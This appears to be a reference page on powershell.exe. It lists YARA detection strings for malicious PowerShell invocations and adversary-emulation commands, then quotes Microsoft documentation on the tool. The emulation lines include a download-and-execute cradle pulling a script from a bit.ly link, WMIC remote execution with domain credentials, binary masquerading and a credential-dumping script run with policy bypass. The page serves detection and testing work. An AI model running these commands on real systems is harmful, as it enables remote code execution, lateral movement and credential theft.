signature-base	apt_unc2447_sombrat.yar	$x2 = “wwansvc.txt’)))" \| powershell.exe -“ ascii fullword	CC BY-NC 4.0
signature-base	apt_wilted_tulip.yar	$x1 = “powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b=’powershell.exe’}else{$b=$env:windir+” ascii	CC BY-NC 4.0
signature-base	gen_empire.yar	$s2 = “$PowershellExe=$env:windir+’\syswow64\WindowsPowerShell\v1.0\powershell.exe’” fullword ascii	CC BY-NC 4.0
signature-base	gen_metasploit_payloads.yar	$s1 = “powershell.exe -nop -w hidden -e” ascii	CC BY-NC 4.0
signature-base	gen_metasploit_payloads.yar	$x1 = “%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e” ascii	CC BY-NC 4.0
signature-base	gen_metasploit_payloads.yar	$s1 = “.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then” fullword ascii	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$p1 = “powershell.exe” fullword ascii	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$s4 = “powershell.exe -w hidden -ep bypass -Enc” ascii	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$s6 = “powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run” nocase	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$s1 = “POwErSHELl.ExE” fullword ascii nocase	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$x1 = “Process.Create("powershell.exe -nop -w hidden” fullword ascii nocase	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$x2 = “.Run"powershell.exe -nop -w hidden -c ""IEX “ ascii	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$x1 = “.Run "powershell.exe -nop -w hidden -e “ ascii	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$x2 = “FileExists(path + "\..\powershell.exe")” fullword ascii	CC BY-NC 4.0
signature-base	gen_ps_empire_eval.yar	$s2 = “powershell.exe” ascii fullword	CC BY-NC 4.0
signature-base	gen_webshells.yar	$exec_shell2 = “powershell.exe” nocase wide ascii	CC BY-NC 4.0
signature-base	gen_winpayloads.yar	$x4 = “powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA” ascii	CC BY-NC 4.0
signature-base	gen_win_privesc.yar	$x1 = “# powershell.exe -executionpolicy bypass -file folderperm.ps1” fullword ascii	CC BY-NC 4.0
signature-base	gen_wmi_implant.yar	$x5 = “-Command ‘powershell.exe -command "Enable-PSRemoting” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s1 = “[*] Looks like we’re 64bit, using regular powershell.exe” ascii wide	CC BY-NC 4.0
stockpile	702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml	`powershell.exe -c "Get-WmiObject -class win32_operatingsystem \\| select -property * \\| export-csv msdebug.log";`	Apache-2.0
stockpile	e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml	`Copy-Item C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\debug.exe;`	Apache-2.0
stockpile	315cedf1-4a3a-4015-b63f-149d64bacbbc.yml	`start powershell.exe -ArgumentList "-NoP","-StA","-ExecutionPolicy","bypass",".\Emulate-Administrator-Tasks.ps1"`	Apache-2.0
stockpile	bfff9006-d1fb-46ce-b173-92cb04e9a031.yml	`powershell.exe -c IEX (New-Object Net.Webclient).downloadstring("https://bit.ly/33H0QXi")`	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	`wmic /node:`”#{remote.host.fqdn}`" /user:`”#{domain.user.name}`" /password:`”#{domain.user.password}`" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";`	Apache-2.0
stockpile	110cea7a-5b03-4443-92ee-7ccefaead451.yml	`$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "$commandString";`	Apache-2.0
stockpile	68235976-2404-42a8-9105-68230cfef562.yml	`powershell.exe -ep bypass -c "Invoke-MemeKatz.ps1"`	Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

PowerShell

Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

Using PowerShell.exe

The PowerShell.exe command-line tool starts a Windows PowerShell session in a Command Prompt window. When you use PowerShell.exe, you can use its optional parameters to customize the session. For example, you can start a session that uses a particular execution policy or one that excludes a Windows PowerShell profile. Otherwise, the session is the same as any session that is started in the Windows PowerShell console.

To start a Windows PowerShell session in a Command Prompt window, type PowerShell. A PS prefix is added to the command prompt to indicate that you are in a Windows PowerShell session.
To start a session with a particular execution policy, use the ExecutionPolicy parameter, and type:
```
  PowerShell.exe -ExecutionPolicy Restricted
```
To start a Windows PowerShell session without your Windows PowerShell profiles, use the NoProfile parameter, and type:
```
  PowerShell.exe -NoProfile
```
To start a session , use the ExecutionPolicy parameter, and type:
```
  PowerShell.exe -ExecutionPolicy Restricted
```

To see the PowerShell.exe help file, type:

  PowerShell.exe -help
  PowerShell.exe -?
  PowerShell.exe /?

To end a Windows PowerShell session in a Command Prompt window, type exit. The typical command prompt returns.

Remarks

For a complete list of the PowerShell.exe command-line parameters, see about_PowerShell.Exe.
For information about other ways to start Windows PowerShell, see Starting Windows PowerShell.
Windows PowerShell runs on the Server Core installation option of Windows Server operating systems. However, features that require a graphic user interface, such as the Windows PowerShell Integrated Scripting Environment (ISE), and the Out-GridView and Show-Command cmdlets, don’t run on Server Core installations.